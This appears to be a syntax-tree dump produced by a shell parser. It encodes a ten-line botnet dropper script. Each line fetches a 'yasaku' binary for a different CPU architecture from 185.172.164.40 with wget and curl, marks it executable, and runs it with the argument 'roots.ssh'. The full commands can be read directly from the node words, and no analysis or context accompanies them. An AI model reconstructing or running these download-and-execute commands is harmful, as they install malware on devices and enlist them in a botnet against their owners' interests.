ListNode(lineno=2, pos=(12, 203), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 109), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 109), word='http://185.172.164.40/bins/yasaku.x86'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(109, 110)),
  CommandNode(lineno=2, pos=(111, 156), parts=[
    WordNode(lineno=2, pos=(111, 115), word='curl'),
    WordNode(lineno=2, pos=(116, 118), word='-O'),
    WordNode(lineno=2, pos=(119, 156), word='http://185.172.164.40/bins/yasaku.x86'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(156, 157)),
  CommandNode(lineno=2, pos=(157, 176), parts=[
    WordNode(lineno=2, pos=(157, 160), word='cat'),
    WordNode(lineno=2, pos=(161, 171), word='yasaku.x86'),
    RedirectNode(lineno=2, output=
      WordNode(lineno=2, pos=(173, 176), word='tmp'), pos=(172, 176), type='>'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(176, 177)),
  CommandNode(lineno=2, pos=(177, 187), parts=[
    WordNode(lineno=2, pos=(177, 182), word='chmod'),
    WordNode(lineno=2, pos=(183, 185), word='+x'),
    WordNode(lineno=2, pos=(186, 187), word='*'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(187, 188)),
  CommandNode(lineno=2, pos=(188, 203), parts=[
    WordNode(lineno=2, pos=(188, 193), word='./tmp'),
    WordNode(lineno=2, pos=(194, 203), word='roots.ssh'),
  ]),
])
ListNode(lineno=3, pos=(204, 398), parts=[
  CommandNode(lineno=3, pos=(204, 211), parts=[
    WordNode(lineno=3, pos=(204, 206), word='cd'),
    WordNode(lineno=3, pos=(207, 211), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(212, 214)),
  CommandNode(lineno=3, pos=(215, 226), parts=[
    WordNode(lineno=3, pos=(215, 217), word='cd'),
    WordNode(lineno=3, pos=(218, 226), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(227, 229)),
  CommandNode(lineno=3, pos=(230, 237), parts=[
    WordNode(lineno=3, pos=(230, 232), word='cd'),
    WordNode(lineno=3, pos=(233, 237), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(238, 240)),
  CommandNode(lineno=3, pos=(241, 249), parts=[
    WordNode(lineno=3, pos=(241, 243), word='cd'),
    WordNode(lineno=3, pos=(244, 249), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(250, 252)),
  CommandNode(lineno=3, pos=(253, 257), parts=[
    WordNode(lineno=3, pos=(253, 255), word='cd'),
    WordNode(lineno=3, pos=(256, 257), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(257, 258)),
  CommandNode(lineno=3, pos=(259, 302), parts=[
    WordNode(lineno=3, pos=(259, 263), word='wget'),
    WordNode(lineno=3, pos=(264, 302), word='http://185.172.164.40/bins/yasaku.mips'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(302, 303)),
  CommandNode(lineno=3, pos=(304, 350), parts=[
    WordNode(lineno=3, pos=(304, 308), word='curl'),
    WordNode(lineno=3, pos=(309, 311), word='-O'),
    WordNode(lineno=3, pos=(312, 350), word='http://185.172.164.40/bins/yasaku.mips'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(350, 351)),
  CommandNode(lineno=3, pos=(351, 371), parts=[
    WordNode(lineno=3, pos=(351, 354), word='cat'),
    WordNode(lineno=3, pos=(355, 366), word='yasaku.mips'),
    RedirectNode(lineno=3, output=
      WordNode(lineno=3, pos=(368, 371), word='tmp'), pos=(367, 371), type='>'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(371, 372)),
  CommandNode(lineno=3, pos=(372, 382), parts=[
    WordNode(lineno=3, pos=(372, 377), word='chmod'),
    WordNode(lineno=3, pos=(378, 380), word='+x'),
    WordNode(lineno=3, pos=(381, 382), word='*'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(382, 383)),
  CommandNode(lineno=3, pos=(383, 398), parts=[
    WordNode(lineno=3, pos=(383, 388), word='./tmp'),
    WordNode(lineno=3, pos=(389, 398), word='roots.ssh'),
  ]),
])
ListNode(lineno=4, pos=(399, 593), parts=[
  CommandNode(lineno=4, pos=(399, 406), parts=[
    WordNode(lineno=4, pos=(399, 401), word='cd'),
    WordNode(lineno=4, pos=(402, 406), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(407, 409)),
  CommandNode(lineno=4, pos=(410, 421), parts=[
    WordNode(lineno=4, pos=(410, 412), word='cd'),
    WordNode(lineno=4, pos=(413, 421), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(422, 424)),
  CommandNode(lineno=4, pos=(425, 432), parts=[
    WordNode(lineno=4, pos=(425, 427), word='cd'),
    WordNode(lineno=4, pos=(428, 432), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(433, 435)),
  CommandNode(lineno=4, pos=(436, 444), parts=[
    WordNode(lineno=4, pos=(436, 438), word='cd'),
    WordNode(lineno=4, pos=(439, 444), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(445, 447)),
  CommandNode(lineno=4, pos=(448, 452), parts=[
    WordNode(lineno=4, pos=(448, 450), word='cd'),
    WordNode(lineno=4, pos=(451, 452), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(452, 453)),
  CommandNode(lineno=4, pos=(454, 497), parts=[
    WordNode(lineno=4, pos=(454, 458), word='wget'),
    WordNode(lineno=4, pos=(459, 497), word='http://185.172.164.40/bins/yasaku.mpsl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(497, 498)),
  CommandNode(lineno=4, pos=(499, 545), parts=[
    WordNode(lineno=4, pos=(499, 503), word='curl'),
    WordNode(lineno=4, pos=(504, 506), word='-O'),
    WordNode(lineno=4, pos=(507, 545), word='http://185.172.164.40/bins/yasaku.mpsl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(545, 546)),
  CommandNode(lineno=4, pos=(546, 566), parts=[
    WordNode(lineno=4, pos=(546, 549), word='cat'),
    WordNode(lineno=4, pos=(550, 561), word='yasaku.mpsl'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(563, 566), word='tmp'), pos=(562, 566), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(566, 567)),
  CommandNode(lineno=4, pos=(567, 577), parts=[
    WordNode(lineno=4, pos=(567, 572), word='chmod'),
    WordNode(lineno=4, pos=(573, 575), word='+x'),
    WordNode(lineno=4, pos=(576, 577), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(577, 578)),
  CommandNode(lineno=4, pos=(578, 593), parts=[
    WordNode(lineno=4, pos=(578, 583), word='./tmp'),
    WordNode(lineno=4, pos=(584, 593), word='roots.ssh'),
  ]),
])
ListNode(lineno=5, pos=(594, 788), parts=[
  CommandNode(lineno=5, pos=(594, 601), parts=[
    WordNode(lineno=5, pos=(594, 596), word='cd'),
    WordNode(lineno=5, pos=(597, 601), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(602, 604)),
  CommandNode(lineno=5, pos=(605, 616), parts=[
    WordNode(lineno=5, pos=(605, 607), word='cd'),
    WordNode(lineno=5, pos=(608, 616), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(617, 619)),
  CommandNode(lineno=5, pos=(620, 627), parts=[
    WordNode(lineno=5, pos=(620, 622), word='cd'),
    WordNode(lineno=5, pos=(623, 627), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(628, 630)),
  CommandNode(lineno=5, pos=(631, 639), parts=[
    WordNode(lineno=5, pos=(631, 633), word='cd'),
    WordNode(lineno=5, pos=(634, 639), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(640, 642)),
  CommandNode(lineno=5, pos=(643, 647), parts=[
    WordNode(lineno=5, pos=(643, 645), word='cd'),
    WordNode(lineno=5, pos=(646, 647), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(647, 648)),
  CommandNode(lineno=5, pos=(649, 692), parts=[
    WordNode(lineno=5, pos=(649, 653), word='wget'),
    WordNode(lineno=5, pos=(654, 692), word='http://185.172.164.40/bins/yasaku.arm4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(692, 693)),
  CommandNode(lineno=5, pos=(694, 740), parts=[
    WordNode(lineno=5, pos=(694, 698), word='curl'),
    WordNode(lineno=5, pos=(699, 701), word='-O'),
    WordNode(lineno=5, pos=(702, 740), word='http://185.172.164.40/bins/yasaku.arm4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(740, 741)),
  CommandNode(lineno=5, pos=(741, 761), parts=[
    WordNode(lineno=5, pos=(741, 744), word='cat'),
    WordNode(lineno=5, pos=(745, 756), word='yasaku.arm4'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(758, 761), word='tmp'), pos=(757, 761), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(761, 762)),
  CommandNode(lineno=5, pos=(762, 772), parts=[
    WordNode(lineno=5, pos=(762, 767), word='chmod'),
    WordNode(lineno=5, pos=(768, 770), word='+x'),
    WordNode(lineno=5, pos=(771, 772), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(772, 773)),
  CommandNode(lineno=5, pos=(773, 788), parts=[
    WordNode(lineno=5, pos=(773, 778), word='./tmp'),
    WordNode(lineno=5, pos=(779, 788), word='roots.ssh'),
  ]),
])
ListNode(lineno=6, pos=(789, 983), parts=[
  CommandNode(lineno=6, pos=(789, 796), parts=[
    WordNode(lineno=6, pos=(789, 791), word='cd'),
    WordNode(lineno=6, pos=(792, 796), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(797, 799)),
  CommandNode(lineno=6, pos=(800, 811), parts=[
    WordNode(lineno=6, pos=(800, 802), word='cd'),
    WordNode(lineno=6, pos=(803, 811), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(812, 814)),
  CommandNode(lineno=6, pos=(815, 822), parts=[
    WordNode(lineno=6, pos=(815, 817), word='cd'),
    WordNode(lineno=6, pos=(818, 822), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(823, 825)),
  CommandNode(lineno=6, pos=(826, 834), parts=[
    WordNode(lineno=6, pos=(826, 828), word='cd'),
    WordNode(lineno=6, pos=(829, 834), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(835, 837)),
  CommandNode(lineno=6, pos=(838, 842), parts=[
    WordNode(lineno=6, pos=(838, 840), word='cd'),
    WordNode(lineno=6, pos=(841, 842), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(842, 843)),
  CommandNode(lineno=6, pos=(844, 887), parts=[
    WordNode(lineno=6, pos=(844, 848), word='wget'),
    WordNode(lineno=6, pos=(849, 887), word='http://185.172.164.40/bins/yasaku.arm5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(887, 888)),
  CommandNode(lineno=6, pos=(889, 935), parts=[
    WordNode(lineno=6, pos=(889, 893), word='curl'),
    WordNode(lineno=6, pos=(894, 896), word='-O'),
    WordNode(lineno=6, pos=(897, 935), word='http://185.172.164.40/bins/yasaku.arm5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(935, 936)),
  CommandNode(lineno=6, pos=(936, 956), parts=[
    WordNode(lineno=6, pos=(936, 939), word='cat'),
    WordNode(lineno=6, pos=(940, 951), word='yasaku.arm5'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(953, 956), word='tmp'), pos=(952, 956), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(956, 957)),
  CommandNode(lineno=6, pos=(957, 967), parts=[
    WordNode(lineno=6, pos=(957, 962), word='chmod'),
    WordNode(lineno=6, pos=(963, 965), word='+x'),
    WordNode(lineno=6, pos=(966, 967), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(967, 968)),
  CommandNode(lineno=6, pos=(968, 983), parts=[
    WordNode(lineno=6, pos=(968, 973), word='./tmp'),
    WordNode(lineno=6, pos=(974, 983), word='roots.ssh'),
  ]),
])
ListNode(lineno=7, pos=(984, 1178), parts=[
  CommandNode(lineno=7, pos=(984, 991), parts=[
    WordNode(lineno=7, pos=(984, 986), word='cd'),
    WordNode(lineno=7, pos=(987, 991), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(992, 994)),
  CommandNode(lineno=7, pos=(995, 1006), parts=[
    WordNode(lineno=7, pos=(995, 997), word='cd'),
    WordNode(lineno=7, pos=(998, 1006), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1007, 1009)),
  CommandNode(lineno=7, pos=(1010, 1017), parts=[
    WordNode(lineno=7, pos=(1010, 1012), word='cd'),
    WordNode(lineno=7, pos=(1013, 1017), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1018, 1020)),
  CommandNode(lineno=7, pos=(1021, 1029), parts=[
    WordNode(lineno=7, pos=(1021, 1023), word='cd'),
    WordNode(lineno=7, pos=(1024, 1029), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1030, 1032)),
  CommandNode(lineno=7, pos=(1033, 1037), parts=[
    WordNode(lineno=7, pos=(1033, 1035), word='cd'),
    WordNode(lineno=7, pos=(1036, 1037), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1037, 1038)),
  CommandNode(lineno=7, pos=(1039, 1082), parts=[
    WordNode(lineno=7, pos=(1039, 1043), word='wget'),
    WordNode(lineno=7, pos=(1044, 1082), word='http://185.172.164.40/bins/yasaku.arm6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1082, 1083)),
  CommandNode(lineno=7, pos=(1084, 1130), parts=[
    WordNode(lineno=7, pos=(1084, 1088), word='curl'),
    WordNode(lineno=7, pos=(1089, 1091), word='-O'),
    WordNode(lineno=7, pos=(1092, 1130), word='http://185.172.164.40/bins/yasaku.arm6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1130, 1131)),
  CommandNode(lineno=7, pos=(1131, 1151), parts=[
    WordNode(lineno=7, pos=(1131, 1134), word='cat'),
    WordNode(lineno=7, pos=(1135, 1146), word='yasaku.arm6'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(1148, 1151), word='tmp'), pos=(1147, 1151), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1151, 1152)),
  CommandNode(lineno=7, pos=(1152, 1162), parts=[
    WordNode(lineno=7, pos=(1152, 1157), word='chmod'),
    WordNode(lineno=7, pos=(1158, 1160), word='+x'),
    WordNode(lineno=7, pos=(1161, 1162), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1162, 1163)),
  CommandNode(lineno=7, pos=(1163, 1178), parts=[
    WordNode(lineno=7, pos=(1163, 1168), word='./tmp'),
    WordNode(lineno=7, pos=(1169, 1178), word='roots.ssh'),
  ]),
])
ListNode(lineno=8, pos=(1179, 1373), parts=[
  CommandNode(lineno=8, pos=(1179, 1186), parts=[
    WordNode(lineno=8, pos=(1179, 1181), word='cd'),
    WordNode(lineno=8, pos=(1182, 1186), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1187, 1189)),
  CommandNode(lineno=8, pos=(1190, 1201), parts=[
    WordNode(lineno=8, pos=(1190, 1192), word='cd'),
    WordNode(lineno=8, pos=(1193, 1201), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1202, 1204)),
  CommandNode(lineno=8, pos=(1205, 1212), parts=[
    WordNode(lineno=8, pos=(1205, 1207), word='cd'),
    WordNode(lineno=8, pos=(1208, 1212), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1213, 1215)),
  CommandNode(lineno=8, pos=(1216, 1224), parts=[
    WordNode(lineno=8, pos=(1216, 1218), word='cd'),
    WordNode(lineno=8, pos=(1219, 1224), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1225, 1227)),
  CommandNode(lineno=8, pos=(1228, 1232), parts=[
    WordNode(lineno=8, pos=(1228, 1230), word='cd'),
    WordNode(lineno=8, pos=(1231, 1232), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1232, 1233)),
  CommandNode(lineno=8, pos=(1234, 1277), parts=[
    WordNode(lineno=8, pos=(1234, 1238), word='wget'),
    WordNode(lineno=8, pos=(1239, 1277), word='http://185.172.164.40/bins/yasaku.arm7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1277, 1278)),
  CommandNode(lineno=8, pos=(1279, 1325), parts=[
    WordNode(lineno=8, pos=(1279, 1283), word='curl'),
    WordNode(lineno=8, pos=(1284, 1286), word='-O'),
    WordNode(lineno=8, pos=(1287, 1325), word='http://185.172.164.40/bins/yasaku.arm7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1325, 1326)),
  CommandNode(lineno=8, pos=(1326, 1346), parts=[
    WordNode(lineno=8, pos=(1326, 1329), word='cat'),
    WordNode(lineno=8, pos=(1330, 1341), word='yasaku.arm7'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(1343, 1346), word='tmp'), pos=(1342, 1346), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1346, 1347)),
  CommandNode(lineno=8, pos=(1347, 1357), parts=[
    WordNode(lineno=8, pos=(1347, 1352), word='chmod'),
    WordNode(lineno=8, pos=(1353, 1355), word='+x'),
    WordNode(lineno=8, pos=(1356, 1357), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1357, 1358)),
  CommandNode(lineno=8, pos=(1358, 1373), parts=[
    WordNode(lineno=8, pos=(1358, 1363), word='./tmp'),
    WordNode(lineno=8, pos=(1364, 1373), word='roots.ssh'),
  ]),
])
ListNode(lineno=9, pos=(1374, 1565), parts=[
  CommandNode(lineno=9, pos=(1374, 1381), parts=[
    WordNode(lineno=9, pos=(1374, 1376), word='cd'),
    WordNode(lineno=9, pos=(1377, 1381), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1382, 1384)),
  CommandNode(lineno=9, pos=(1385, 1396), parts=[
    WordNode(lineno=9, pos=(1385, 1387), word='cd'),
    WordNode(lineno=9, pos=(1388, 1396), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1397, 1399)),
  CommandNode(lineno=9, pos=(1400, 1407), parts=[
    WordNode(lineno=9, pos=(1400, 1402), word='cd'),
    WordNode(lineno=9, pos=(1403, 1407), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1408, 1410)),
  CommandNode(lineno=9, pos=(1411, 1419), parts=[
    WordNode(lineno=9, pos=(1411, 1413), word='cd'),
    WordNode(lineno=9, pos=(1414, 1419), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1420, 1422)),
  CommandNode(lineno=9, pos=(1423, 1427), parts=[
    WordNode(lineno=9, pos=(1423, 1425), word='cd'),
    WordNode(lineno=9, pos=(1426, 1427), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1427, 1428)),
  CommandNode(lineno=9, pos=(1429, 1471), parts=[
    WordNode(lineno=9, pos=(1429, 1433), word='wget'),
    WordNode(lineno=9, pos=(1434, 1471), word='http://185.172.164.40/bins/yasaku.ppc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1471, 1472)),
  CommandNode(lineno=9, pos=(1473, 1518), parts=[
    WordNode(lineno=9, pos=(1473, 1477), word='curl'),
    WordNode(lineno=9, pos=(1478, 1480), word='-O'),
    WordNode(lineno=9, pos=(1481, 1518), word='http://185.172.164.40/bins/yasaku.ppc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1518, 1519)),
  CommandNode(lineno=9, pos=(1519, 1538), parts=[
    WordNode(lineno=9, pos=(1519, 1522), word='cat'),
    WordNode(lineno=9, pos=(1523, 1533), word='yasaku.ppc'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(1535, 1538), word='tmp'), pos=(1534, 1538), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1538, 1539)),
  CommandNode(lineno=9, pos=(1539, 1549), parts=[
    WordNode(lineno=9, pos=(1539, 1544), word='chmod'),
    WordNode(lineno=9, pos=(1545, 1547), word='+x'),
    WordNode(lineno=9, pos=(1548, 1549), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1549, 1550)),
  CommandNode(lineno=9, pos=(1550, 1565), parts=[
    WordNode(lineno=9, pos=(1550, 1555), word='./tmp'),
    WordNode(lineno=9, pos=(1556, 1565), word='roots.ssh'),
  ]),
])
ListNode(lineno=10, pos=(1566, 1760), parts=[
  CommandNode(lineno=10, pos=(1566, 1573), parts=[
    WordNode(lineno=10, pos=(1566, 1568), word='cd'),
    WordNode(lineno=10, pos=(1569, 1573), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1574, 1576)),
  CommandNode(lineno=10, pos=(1577, 1588), parts=[
    WordNode(lineno=10, pos=(1577, 1579), word='cd'),
    WordNode(lineno=10, pos=(1580, 1588), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1589, 1591)),
  CommandNode(lineno=10, pos=(1592, 1599), parts=[
    WordNode(lineno=10, pos=(1592, 1594), word='cd'),
    WordNode(lineno=10, pos=(1595, 1599), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1600, 1602)),
  CommandNode(lineno=10, pos=(1603, 1611), parts=[
    WordNode(lineno=10, pos=(1603, 1605), word='cd'),
    WordNode(lineno=10, pos=(1606, 1611), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1612, 1614)),
  CommandNode(lineno=10, pos=(1615, 1619), parts=[
    WordNode(lineno=10, pos=(1615, 1617), word='cd'),
    WordNode(lineno=10, pos=(1618, 1619), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1619, 1620)),
  CommandNode(lineno=10, pos=(1621, 1664), parts=[
    WordNode(lineno=10, pos=(1621, 1625), word='wget'),
    WordNode(lineno=10, pos=(1626, 1664), word='http://185.172.164.40/bins/yasaku.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1664, 1665)),
  CommandNode(lineno=10, pos=(1666, 1712), parts=[
    WordNode(lineno=10, pos=(1666, 1670), word='curl'),
    WordNode(lineno=10, pos=(1671, 1673), word='-O'),
    WordNode(lineno=10, pos=(1674, 1712), word='http://185.172.164.40/bins/yasaku.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1712, 1713)),
  CommandNode(lineno=10, pos=(1713, 1733), parts=[
    WordNode(lineno=10, pos=(1713, 1716), word='cat'),
    WordNode(lineno=10, pos=(1717, 1728), word='yasaku.m68k'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(1730, 1733), word='tmp'), pos=(1729, 1733), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1733, 1734)),
  CommandNode(lineno=10, pos=(1734, 1744), parts=[
    WordNode(lineno=10, pos=(1734, 1739), word='chmod'),
    WordNode(lineno=10, pos=(1740, 1742), word='+x'),
    WordNode(lineno=10, pos=(1743, 1744), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1744, 1745)),
  CommandNode(lineno=10, pos=(1745, 1760), parts=[
    WordNode(lineno=10, pos=(1745, 1750), word='./tmp'),
    WordNode(lineno=10, pos=(1751, 1760), word='roots.ssh'),
  ]),
])
ListNode(lineno=11, pos=(1761, 1952), parts=[
  CommandNode(lineno=11, pos=(1761, 1768), parts=[
    WordNode(lineno=11, pos=(1761, 1763), word='cd'),
    WordNode(lineno=11, pos=(1764, 1768), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1769, 1771)),
  CommandNode(lineno=11, pos=(1772, 1783), parts=[
    WordNode(lineno=11, pos=(1772, 1774), word='cd'),
    WordNode(lineno=11, pos=(1775, 1783), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1784, 1786)),
  CommandNode(lineno=11, pos=(1787, 1794), parts=[
    WordNode(lineno=11, pos=(1787, 1789), word='cd'),
    WordNode(lineno=11, pos=(1790, 1794), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1795, 1797)),
  CommandNode(lineno=11, pos=(1798, 1806), parts=[
    WordNode(lineno=11, pos=(1798, 1800), word='cd'),
    WordNode(lineno=11, pos=(1801, 1806), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1807, 1809)),
  CommandNode(lineno=11, pos=(1810, 1814), parts=[
    WordNode(lineno=11, pos=(1810, 1812), word='cd'),
    WordNode(lineno=11, pos=(1813, 1814), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1814, 1815)),
  CommandNode(lineno=11, pos=(1816, 1858), parts=[
    WordNode(lineno=11, pos=(1816, 1820), word='wget'),
    WordNode(lineno=11, pos=(1821, 1858), word='http://185.172.164.40/bins/yasaku.sh4'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1858, 1859)),
  CommandNode(lineno=11, pos=(1860, 1905), parts=[
    WordNode(lineno=11, pos=(1860, 1864), word='curl'),
    WordNode(lineno=11, pos=(1865, 1867), word='-O'),
    WordNode(lineno=11, pos=(1868, 1905), word='http://185.172.164.40/bins/yasaku.sh4'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1905, 1906)),
  CommandNode(lineno=11, pos=(1906, 1925), parts=[
    WordNode(lineno=11, pos=(1906, 1909), word='cat'),
    WordNode(lineno=11, pos=(1910, 1920), word='yasaku.sh4'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1922, 1925), word='tmp'), pos=(1921, 1925), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1925, 1926)),
  CommandNode(lineno=11, pos=(1926, 1936), parts=[
    WordNode(lineno=11, pos=(1926, 1931), word='chmod'),
    WordNode(lineno=11, pos=(1932, 1934), word='+x'),
    WordNode(lineno=11, pos=(1935, 1936), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1936, 1937)),
  CommandNode(lineno=11, pos=(1937, 1952), parts=[
    WordNode(lineno=11, pos=(1937, 1942), word='./tmp'),
    WordNode(lineno=11, pos=(1943, 1952), word='roots.ssh'),
  ]),
])
